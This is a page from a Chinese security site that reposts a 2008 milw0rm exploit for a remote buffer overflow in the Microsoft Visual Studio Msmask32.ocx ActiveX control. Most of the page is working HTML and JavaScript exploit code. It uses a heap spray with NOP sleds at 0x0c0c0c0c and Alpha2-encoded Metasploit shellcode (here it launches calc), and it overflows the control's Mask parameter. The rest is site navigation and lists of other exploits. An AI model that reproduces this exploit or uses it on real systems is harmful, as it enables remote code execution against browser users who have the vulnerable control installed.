首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit 来源：http://www.milw0rm.com 作者：Koshi 发布时间：2008-08-27   Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit Author: Koshi Original POC: http://www.milw0rm.com/exploits/6244 ( Not by me ) My first ActiveX exploit, learned quite a bit playing with this one. Heaps are handy. ################################################# Loaded File: C:\WINDOWS\system32\MSMASK32.OCX Name:        MSMask Version:     1.1 Class MaskEdBox GUID: {C932BA85-4374-101B-A56C-00AA003668DC} Number of Interfaces: 1 Default Interface: IMSMask RegKey Safe for Script: False RegKey Safe for Init: True KillBitSet: False ################################################# gr33tz: Rima my baby, str0ke, mess, and to all of those who have helped me over the years! <input language=JavaScript onclick=doIt() type=button value="Test Exploit"> <script language="JavaScript"> function doIt() { var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf1 = ''; for (i=1;i<=1945;i++){buf1=buf1+unescape("%0c");} // win32_exec -  EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com var shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" + "%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" + "%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" + "%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" + "%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" + "%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" + "%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" + "%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" + "%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" + "%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" + "%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" + "%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" + "%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" + "%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" + "%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" + "%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" + "%u6363%u5251%u634c%u5553%u4550"); // A read through "Heap Feng Shui in JavaScript" shed some // much needed light on this topic for me. Thank you Alexander Sotirov. var shellcodeSize = (shellcode.length * 2); var spraySled = unescape("%u9090%u9090"); var heapAddress = 0x0c0c0c0c; var heapBlockSize = 0x100000; var spraySledSize = heapBlockSize - (shellcodeSize + 1); var heapBlocks = (heapAddress+heapBlockSize)/heapBlockSize; var x = new Array(); while (spraySled.length*2<spraySledSize) { spraySled += spraySled; } spraySled = spraySled.substring(0,spraySledSize/2); for (i=0;i<heapBlocks;i++) { x[i] = spraySled +  shellcode; } document.write(body+buf1+body1); } </script>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·MyBulletinBoard (MyBB) <= 1.2. ·Simple PHP Blog (SPHPBlog) <= ·GeekLog <= 1.5.0 Remote Arbitr ·Ultra Office ActiveX Control R ·Belkin wireless G router + ADS ·Ultra Office ActiveX Control R ·Dana IRC 1.4a Remote Buffer Ov ·Acoustica Mixcraft <= 4.2 Buil ·NoName Script <= 1.1 Multiple ·Friendly Technologies (fwRemot ·webEdition CMS (we_objectID) B ·Friendly Technologies (fwRemot   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved